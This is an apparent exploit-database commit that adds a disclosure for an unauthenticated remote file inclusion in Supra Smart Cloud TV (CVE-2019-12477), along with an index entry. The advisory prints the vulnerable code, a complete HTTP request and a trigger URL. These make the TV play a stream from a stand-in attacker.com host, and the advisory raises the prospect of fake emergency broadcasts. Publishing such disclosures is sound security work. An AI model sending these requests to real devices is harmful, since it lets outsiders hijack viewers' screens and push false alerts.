DB: 2019-06-07
1 changes to exploits/shellcodes Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion
This commit is contained in:
parent
e76aee5eaf
commit
35d500a3cb
2 changed files with 60 additions and 0 deletions
59
exploits/hardware/webapps/46971.txt
Normal file
59
exploits/hardware/webapps/46971.txt
Normal file
|
@ -0,0 +1,59 @@
|
|||
Exploit Title: Remote file inclusion
|
||||
# Date: 03-06-2019
|
||||
# Exploit Author: Dhiraj Mishra
|
||||
# Vendor Homepage: https://supra.ru
|
||||
# Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/
|
||||
# CVE: CVE-2019-12477
|
||||
# References:
|
||||
# https://nvd.nist.gov/vuln/detail/CVE-2019-12477
|
||||
# https://www.inputzero.io/2019/06/hacking-smart-tv.html
|
||||
|
||||
Summary:
|
||||
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL
|
||||
function, which allows a local attacker to broadcast fake video without any
|
||||
authentication via a /remote/media_control?action=setUri&uri=URI
|
||||
|
||||
Technical Observation:
|
||||
We are abusing `openLiveURL()` which allows a local attacker to broadcast
|
||||
video on supra smart cloud TV. I found this vulnerability initially by
|
||||
source code review and then by crawling the application and reading every
|
||||
request helped me to trigger this vulnerability.
|
||||
|
||||
Vulnerable code:
|
||||
|
||||
function openLiveTV(url)
|
||||
{
|
||||
$.get("/remote/media_control",
|
||||
{m_action:'setUri',m_uri:url,m_type:'video/*'},
|
||||
function (data, textStatus){
|
||||
if("success"==textStatus){
|
||||
alert(textStatus);
|
||||
}else
|
||||
{
|
||||
alert(textStatus);
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
Vulnerable request:
|
||||
|
||||
GET /remote/media_control?action=setUri&uri=
|
||||
http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
|
||||
Host: 192.168.1.155
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
|
||||
Gecko/20100101 Firefox/66.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
To trigger the vulnerability you can send a crafted request to the URL,
|
||||
|
||||
http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8
|
||||
|
||||
Although the above mention URL takes (.m3u8) format based video. We can use
|
||||
`curl -v -X GET` to send such request, typically this is an unauth remote
|
||||
file inclusion. An attacker could broadcast any video without any
|
||||
authentication, the worst case attacker could leverage this vulnerability
|
||||
to broadcast a fake emergency message.
|
|
@ -41379,3 +41379,4 @@ id,file,description,date,author,type,platform,port
|
|||
46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
|
||||
46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
|
||||
46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,
|
||||
46971,exploits/hardware/webapps/46971.txt,"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion",2019-06-06,"Dhiraj Mishra",webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue